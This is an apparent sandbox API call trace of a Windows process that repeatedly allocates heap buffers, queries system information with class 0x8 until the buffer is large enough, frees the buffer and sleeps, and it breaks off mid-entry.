[0195.430] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.431] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.431] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.432] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.433] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.433] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.434] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.436] Sleep (dwMilliseconds=0x110) [0195.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.458] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.459] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.459] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.460] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.460] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.461] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.475] Sleep (dwMilliseconds=0x110) [0195.538] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.538] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.540] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.540] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.540] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.541] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.541] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.541] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.542] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.542] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.542] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.543] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.543] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.545] Sleep (dwMilliseconds=0x110) [0195.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.614] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.615] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.615] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.615] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.616] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.616] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.617] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.617] Sleep (dwMilliseconds=0x110) [0195.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.630] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.631] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.631] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.632] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.632] Sleep (dwMilliseconds=0x110) [0195.677] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.677] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.678] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.678] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.678] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.679] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.679] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.681] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.681] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.682] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.682] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.682] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.683] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.683] Sleep (dwMilliseconds=0x110) [0195.700] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.700] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.705] Sleep (dwMilliseconds=0x110) [0195.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.724] Sleep (dwMilliseconds=0x110) [0195.756] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.756] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.757] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.757] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.757] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.758] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.758] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.758] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.759] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.759] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.759] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.760] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.760] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.761] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.761] Sleep (dwMilliseconds=0x110) [0195.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.770] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.771] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.771] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.772] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.773] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.773] Sleep (dwMilliseconds=0x110) [0195.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.817] Sleep (dwMilliseconds=0x110) [0195.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.832] Sleep (dwMilliseconds=0x110) [0195.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.848] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.849] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.849] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.850] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.850] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.851] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.852] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.852] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.852] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.853] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.853] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.854] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.854] Sleep (dwMilliseconds=0x110) [0195.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.864] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.864] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.865] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.865] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.866] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.866] Sleep (dwMilliseconds=0x110) [0195.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 